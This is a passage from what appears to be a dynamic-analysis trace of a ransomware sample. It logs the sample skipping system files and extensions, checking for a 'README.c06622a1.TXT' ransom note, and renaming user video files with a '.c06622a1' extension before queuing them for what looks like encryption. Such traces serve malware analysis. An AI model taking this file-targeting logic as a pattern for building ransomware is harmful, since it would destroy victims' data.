0x3 [0156.543] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0156.543] wcslen (_String="icl") returned 0x3 [0156.543] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0156.543] wcslen (_String="icns") returned 0x4 [0156.543] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0156.543] wcslen (_String="ico") returned 0x3 [0156.543] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0156.543] wcslen (_String="ics") returned 0x3 [0156.543] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0156.543] wcslen (_String="idx") returned 0x3 [0156.543] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0156.543] wcslen (_String="ldf") returned 0x3 [0156.543] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0156.543] wcslen (_String="lnk") returned 0x3 [0156.543] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0156.543] wcslen (_String="mod") returned 0x3 [0156.543] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0156.543] wcslen (_String="mpa") returned 0x3 [0156.543] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0156.543] wcslen (_String="msc") returned 0x3 [0156.543] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0156.543] wcslen (_String="msp") returned 0x3 [0156.543] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0156.543] wcslen (_String="msstyles") returned 0x8 [0156.543] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0156.543] wcslen (_String="msu") returned 0x3 [0156.543] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0156.543] wcslen (_String="nls") returned 0x3 [0156.543] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0156.543] wcslen (_String="nomedia") returned 0x7 [0156.543] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0156.544] wcslen (_String="ocx") returned 0x3 [0156.544] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0156.544] wcslen (_String="prf") returned 0x3 [0156.544] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0156.544] wcslen (_String="ps1") returned 0x3 [0156.544] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0156.544] wcslen (_String="rom") returned 0x3 [0156.544] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0156.544] wcslen (_String="rtp") returned 0x3 [0156.544] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0156.544] wcslen (_String="scr") returned 0x3 [0156.544] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0156.544] wcslen (_String="shs") returned 0x3 [0156.544] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0156.544] wcslen (_String="spl") returned 0x3 [0156.544] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0156.544] wcslen (_String="sys") returned 0x3 [0156.544] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0156.544] wcslen (_String="theme") returned 0x5 [0156.544] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0156.544] wcslen (_String="themepack") returned 0x9 [0156.544] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0156.544] wcslen (_String="wpx") returned 0x3 [0156.544] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0156.544] wcslen (_String="lock") returned 0x4 [0156.544] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0156.544] wcslen (_String="key") returned 0x3 [0156.544] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0156.544] wcslen (_String="hta") returned 0x3 [0156.544] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0156.544] wcslen (_String="msi") returned 0x3 [0156.544] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0156.544] wcslen (_String="pdb") returned 0x3 [0156.544] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0156.544] wcslen (_String="sql") returned 0x3 [0156.544] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0156.544] wcslen (_String="sqlite") returned 0x6 [0156.545] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x")) returned 0x10 [0156.545] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.545] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" [0156.545] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X") returned 0x4b [0156.545] wcscpy (in: _Dest=0x4560158, _Source="GP1tjsXSUsoxTDW.mkv" | out: _Dest="GP1tjsXSUsoxTDW.mkv") returned="GP1tjsXSUsoxTDW.mkv" [0156.545] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\GP1tjsXSUsoxTDW.mkv", dwFileAttributes=0x80) returned 1 [0156.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\GP1tjsXSUsoxTDW.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\gp1tjsxsusoxtdw.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0156.545] SetFilePointerEx (in: hFile=0x618, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.545] ReadFile (in: hFile=0x618, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.546] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x6f46b6c1 [0156.546] RtlComputeCrc32 (PartialCrc=0xb6c1, Buffer=0x3fe3f4, Length=0x80) returned 0xe7537c3b [0156.546] RtlComputeCrc32 (PartialCrc=0x7c3b, Buffer=0x3fe3f4, Length=0x80) returned 0x6aaf38f7 [0156.546] RtlComputeCrc32 (PartialCrc=0x38f7, Buffer=0x3fe3f4, Length=0x80) returned 0xac8f22b6 [0156.546] RtlComputeCrc32 (PartialCrc=0x22b6, Buffer=0x3fe3f4, Length=0x80) returned 0x914fb675 [0156.546] CloseHandle (hObject=0x618) returned 1 [0156.546] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.546] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\GP1tjsXSUsoxTDW.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\GP1tjsXSUsoxTDW.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\GP1tjsXSUsoxTDW.mkv" [0156.546] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\GP1tjsXSUsoxTDW.mkv") returned 0x5f [0156.546] wcscpy (in: _Dest=0x4570186, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.546] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\GP1tjsXSUsoxTDW.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\gp1tjsxsusoxtdw.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\GP1tjsXSUsoxTDW.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\gp1tjsxsusoxtdw.mkv.c06622a1"), dwFlags=0x8) returned 1 [0156.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\GP1tjsXSUsoxTDW.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\gp1tjsxsusoxtdw.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x618 [0156.549] CreateIoCompletionPort (FileHandle=0x618, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.549] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0156.554] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x440a9c22 [0156.554] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x14e9df2e [0156.554] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a2fdeae [0156.554] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x19018109 [0156.554] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x55bc1e90 [0156.554] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6997644c [0156.554] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1d271d9e [0156.554] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x225c8601 [0156.557] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0x57aa2c6b [0156.557] RtlComputeCrc32 (PartialCrc=0x2c6b, Buffer=0x4280094, Length=0x80) returned 0xc3b690ab [0156.557] RtlComputeCrc32 (PartialCrc=0x90ab, Buffer=0x4280094, Length=0x80) returned 0x203f02fa [0156.557] RtlComputeCrc32 (PartialCrc=0x2fa, Buffer=0x4280094, Length=0x80) returned 0xde07d5f0 [0156.557] RtlComputeCrc32 (PartialCrc=0xd5f0, Buffer=0x4280094, Length=0x80) returned 0x5ea5b96d [0156.557] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0156.557] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.557] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.558] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde2bad0, ftCreationTime.dwHighDateTime=0x1d5da96, ftLastAccessTime.dwLowDateTime=0x94701bc0, ftLastAccessTime.dwHighDateTime=0x1d5e4e0, ftLastWriteTime.dwLowDateTime=0x94701bc0, ftLastWriteTime.dwHighDateTime=0x1d5e4e0, nFileSizeHigh=0x0, nFileSizeLow=0x11a5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="JgvxUVpMfo2px.mkv", cAlternateFileName="JGVXUV~1.MKV")) returned 1 [0156.558] _wcsicmp (_Str1="JgvxUVpMfo2px.mkv", _Str2="README.c06622a1.TXT") returned -8 [0156.558] wcsstr (_Str="JgvxUVpMfo2px.mkv", _SubStr="README") returned 0x0 [0156.558] _wcsicmp (_Str1="autorun.inf", _Str2="JgvxUVpMfo2px.mkv") returned -9 [0156.558] wcslen (_String="autorun.inf") returned 0xb [0156.558] _wcsicmp (_Str1="boot.ini", _Str2="JgvxUVpMfo2px.mkv") returned -8 [0156.558] wcslen (_String="boot.ini") returned 0x8 [0156.558] _wcsicmp (_Str1="bootfont.bin", _Str2="JgvxUVpMfo2px.mkv") returned -8 [0156.558] wcslen (_String="bootfont.bin") returned 0xc [0156.558] _wcsicmp (_Str1="bootsect.bak", _Str2="JgvxUVpMfo2px.mkv") returned -8 [0156.558] wcslen (_String="bootsect.bak") returned 0xc [0156.558] _wcsicmp (_Str1="desktop.ini", _Str2="JgvxUVpMfo2px.mkv") returned -6 [0156.558] wcslen (_String="desktop.ini") returned 0xb [0156.558] _wcsicmp (_Str1="iconcache.db", _Str2="JgvxUVpMfo2px.mkv") returned -1 [0156.558] wcslen (_String="iconcache.db") returned 0xc [0156.558] _wcsicmp (_Str1="ntldr", _Str2="JgvxUVpMfo2px.mkv") returned 4 [0156.558] wcslen (_String="ntldr") returned 0x5 [0156.558] _wcsicmp (_Str1="ntuser.dat", _Str2="JgvxUVpMfo2px.mkv") returned 4 [0156.558] wcslen (_String="ntuser.dat") returned 0xa [0156.558] _wcsicmp (_Str1="ntuser.dat.log", _Str2="JgvxUVpMfo2px.mkv") returned 4 [0156.558] wcslen (_String="ntuser.dat.log") returned 0xe [0156.558] _wcsicmp (_Str1="ntuser.ini", _Str2="JgvxUVpMfo2px.mkv") returned 4 [0156.558] wcslen (_String="ntuser.ini") returned 0xa [0156.558] _wcsicmp (_Str1="thumbs.db", _Str2="JgvxUVpMfo2px.mkv") returned 10 [0156.558] wcslen (_String="thumbs.db") returned 0x9 [0156.558] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0156.558] wcslen (_String="386") returned 0x3 [0156.558] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0156.558] wcslen (_String="adv") returned 0x3 [0156.558] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0156.558] wcslen (_String="ani") returned 0x3 [0156.558] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0156.558] wcslen (_String="bat") returned 0x3 [0156.558] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0156.558] wcslen (_String="bin") returned 0x3 [0156.558] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0156.558] wcslen (_String="cab") returned 0x3 [0156.559] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0156.559] wcslen (_String="cmd") returned 0x3 [0156.559] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0156.559] wcslen (_String="com") returned 0x3 [0156.559] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0156.559] wcslen (_String="cpl") returned 0x3 [0156.559] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0156.559] wcslen (_String="cur") returned 0x3 [0156.559] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0156.559] wcslen (_String="deskthemepack") returned 0xd [0156.559] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0156.559] wcslen (_String="diagcab") returned 0x7 [0156.559] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0156.559] wcslen (_String="diagcfg") returned 0x7 [0156.559] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0156.559] wcslen (_String="diagpkg") returned 0x7 [0156.559] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0156.559] wcslen (_String="dll") returned 0x3 [0156.559] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0156.559] wcslen (_String="drv") returned 0x3 [0156.559] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0156.559] wcslen (_String="exe") returned 0x3 [0156.559] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0156.559] wcslen (_String="hlp") returned 0x3 [0156.559] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0156.559] wcslen (_String="icl") returned 0x3 [0156.559] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0156.559] wcslen (_String="icns") returned 0x4 [0156.559] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0156.559] wcslen (_String="ico") returned 0x3 [0156.559] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0156.559] wcslen (_String="ics") returned 0x3 [0156.559] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0156.559] wcslen (_String="idx") returned 0x3 [0156.559] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0156.559] wcslen (_String="ldf") returned 0x3 [0156.559] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0156.559] wcslen (_String="lnk") returned 0x3 [0156.559] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0156.560] wcslen (_String="mod") returned 0x3 [0156.560] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0156.560] wcslen (_String="mpa") returned 0x3 [0156.560] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0156.560] wcslen (_String="msc") returned 0x3 [0156.560] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0156.560] wcslen (_String="msp") returned 0x3 [0156.560] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0156.560] wcslen (_String="msstyles") returned 0x8 [0156.560] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0156.560] wcslen (_String="msu") returned 0x3 [0156.560] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0156.560] wcslen (_String="nls") returned 0x3 [0156.560] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0156.560] wcslen (_String="nomedia") returned 0x7 [0156.560] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0156.560] wcslen (_String="ocx") returned 0x3 [0156.560] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0156.560] wcslen (_String="prf") returned 0x3 [0156.560] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0156.560] wcslen (_String="ps1") returned 0x3 [0156.560] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0156.560] wcslen (_String="rom") returned 0x3 [0156.560] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0156.561] wcslen (_String="rtp") returned 0x3 [0156.561] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0156.561] wcslen (_String="scr") returned 0x3 [0156.561] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0156.561] wcslen (_String="shs") returned 0x3 [0156.561] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0156.561] wcslen (_String="spl") returned 0x3 [0156.561] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0156.561] wcslen (_String="sys") returned 0x3 [0156.561] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0156.561] wcslen (_String="theme") returned 0x5 [0156.561] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0156.561] wcslen (_String="themepack") returned 0x9 [0156.561] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0156.561] wcslen (_String="wpx") returned 0x3 [0156.561] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0156.561] wcslen (_String="lock") returned 0x4 [0156.561] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0156.561] wcslen (_String="key") returned 0x3 [0156.561] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0156.561] wcslen (_String="hta") returned 0x3 [0156.561] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0156.561] wcslen (_String="msi") returned 0x3 [0156.561] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0156.561] wcslen (_String="pdb") returned 0x3 [0156.561] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0156.561] wcslen (_String="sql") returned 0x3 [0156.561] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0156.561] wcslen (_String="sqlite") returned 0x6 [0156.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x")) returned 0x10 [0156.561] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.561] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" [0156.561] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X") returned 0x4b [0156.561] wcscpy (in: _Dest=0x4560158, _Source="JgvxUVpMfo2px.mkv" | out: _Dest="JgvxUVpMfo2px.mkv") returned="JgvxUVpMfo2px.mkv" [0156.562] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\JgvxUVpMfo2px.mkv", dwFileAttributes=0x80) returned 1 [0156.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\JgvxUVpMfo2px.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\jgvxuvpmfo2px.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x630 [0156.562] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.562] ReadFile (in: hFile=0x630, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.563] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x99fb0b4e [0156.563] RtlComputeCrc32 (PartialCrc=0xb4e, Buffer=0x3fe3f4, Length=0x80) returned 0x2742fc62 [0156.563] RtlComputeCrc32 (PartialCrc=0xfc62, Buffer=0x3fe3f4, Length=0x80) returned 0x160169d5 [0156.563] RtlComputeCrc32 (PartialCrc=0x69d5, Buffer=0x3fe3f4, Length=0x80) returned 0x7df8ff65 [0156.563] RtlComputeCrc32 (PartialCrc=0xff65, Buffer=0x3fe3f4, Length=0x80) returned 0x820b5c73 [0156.563] CloseHandle (hObject=0x630) returned 1 [0156.563] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.563] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\JgvxUVpMfo2px.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\JgvxUVpMfo2px.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\JgvxUVpMfo2px.mkv" [0156.563] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\JgvxUVpMfo2px.mkv") returned 0x5d [0156.563] wcscpy (in: _Dest=0x4570182, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.563] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\JgvxUVpMfo2px.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\jgvxuvpmfo2px.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\JgvxUVpMfo2px.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\jgvxuvpmfo2px.mkv.c06622a1"), dwFlags=0x8) returned 1 [0156.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\JgvxUVpMfo2px.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\jgvxuvpmfo2px.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x630 [0156.565] CreateIoCompletionPort (FileHandle=0x630, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.565] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0156.570] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x782236e1 [0156.571] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x58ac9521 [0156.571] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x43058be5 [0156.571] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x496d8e9d [0156.571] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5fe9e9f1 [0156.571] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x302c5dec [0156.571] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x645a507b [0156.571] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x77e65230 [0156.574] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0xfc87f39a [0156.574] RtlComputeCrc32 (PartialCrc=0xf39a, Buffer=0x4670094, Length=0x80) returned 0xd89939f2 [0156.574] RtlComputeCrc32 (PartialCrc=0x39f2, Buffer=0x4670094, Length=0x80) returned 0x855c83d3 [0156.574] RtlComputeCrc32 (PartialCrc=0x83d3, Buffer=0x4670094, Length=0x80) returned 0x9e93ff17 [0156.574] RtlComputeCrc32 (PartialCrc=0xff17, Buffer=0x4670094, Length=0x80) returned 0xdf7fa26e [0156.574] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0156.574] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.574] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.574] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e855740, ftCreationTime.dwHighDateTime=0x1d5e09a, ftLastAccessTime.dwLowDateTime=0x7f3d7f70, ftLastAccessTime.dwHighDateTime=0x1d5d7ef, ftLastWriteTime.dwLowDateTime=0x7f3d7f70, ftLastWriteTime.dwHighDateTime=0x1d5d7ef, 